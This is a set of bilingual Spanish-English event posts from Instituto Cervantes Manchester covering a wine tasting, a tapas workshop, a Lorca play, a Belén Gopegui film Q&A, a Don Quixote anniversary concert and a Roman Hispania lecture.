Esta semana hemos disfrutado de una nueva sesión de cata de vinos, una estupenda actividad para degustar y conocer los mejores caldos (¡y tapas!) de España, organizada por el Instituto Cervantes y The School of Wine of Manchester.

Dado el éxito de este taller, esperamos poder anunciar próximamente nuevas fechas con más catas de vino. Mientras tanto, ¿por qué no abrir boca con el apetitoso taller de Tapas Españolas? Comenzará el próximo 18 de junio, consigue tu plaza y aprende a preparar deliciosas tapas con las que deleitar a la familia y amigos este verano.

Hello friends,

This week we enjoyed a new session of our Spanish Wines Workshop, which is a wonderful activity to taste and learn about some of the best wines (and tapas!) from Spain, and it’s organised by Instituto Cervantes along with The School of Wine of Manchester.

Due to the success of this workshop series, we hopefully announce new dates of wine tasting pretty soon. Meanwhile, why not treat yourself by joining us in Spanish Tapas Workshops? First session will start next 18th June, so take the chance to have real fun while you learn cooking delicious tapas that will delight your family and friends this summer.

Esta vez nos gustaría recomendarles un espectáculo muy especial: ‘Lorca: Amor en el Jardín’, que representará la compañía Théâtre Sans Frontières el próximo lunes 11 y martes 22 en Z-arts (7:30 pm). Esta función que aúna música y poesía está basada en la producción original ‘El Amor de Don Perlimplín con Belisa en su Jardín’, de Federico García Lorca.

La escritora Belén Gopegui (Madrid, 1963) asistió el miércoles al Instituto Cervantes de Mánchester para participar en un Q&A que tuvo lugar tras la proyección del filme ‘Las razones de mis amigos’ (Friends Have Reasons), basada en la novela de Gopegui ‘La conquista del aire’. El acto se enmarca en un programa elaborado en colaboración con las universidades de Mánchester, Sheffield y Liverpool. El Instituto Cervantes desea agradecer la atención de Belén Gopegui, así como la dedicación de todas las personas que han hecho posible su visita.

Writer Belen Gopegui (Madrid, 1963) came last Wednesday to Manchester’s Instituto Cervantes to take part in a Q&A that followed the screening of ‘Las razones de mis amigos’ (Friends Have Reasons), based on the novel by Gopegui ‘La Conquista del Aire’. This event belongs to a programme arranged along with the Universities of Manchester, Sheffield and Liverpool. Instituto Cervantes wishes to thank Belen Gopegui for her kindness, as well as the dedication of everyone involved in Gopegui’s visit.

Muchísimas gracias a todas las personas que ayer celebraron con nosotros el Día Internacional del Libro (y Sant Jordi) en el Instituto Cervantes de Mánchester, con el concierto que ofrecieron los estudiantes en el Royal Northern College of Music (RNCM). La encantadora velada conmemoró asimismo los 400 años de la segunda parte de Don Quijote. Desde aquí agradecemos la brillante interpretación de piezas de la época de Cervantes que realizaron los estudiantes del RNCM.

Thanks very much to all the people who yesterday celebrated with us the International Book Day (and Sant Jordi) at Instituto Cervantes in Manchester, with the concert performed by students at Royal Northern College of Music (RNCM). The lovely evening also commemorated the 400 anniversary of the second part of Don Quixote. We would also like to thank the brilliant performance of Cervantes’ time pieces by the students at RNCM.

Fue un verdadero placer contar con el Dr. A. Fear y Ruth Morello (Manchester Classical Association) en la velada de anoche. La charla sobre España Romana que impartió el Dr. A. Fear fue tan interesante como amena, pues consiguió resumir seis siglos de historia de forma muy animada.

It was a real pleasure to have Dr. A. Fear and Ruth Morello (Manchester Classical Association) with us yesterday’s evening. The lecture on Roman Hispania conducted by Dr. A. Fear was as interesting as lively, as he managed to sum up six centuries of history so cheerfully.
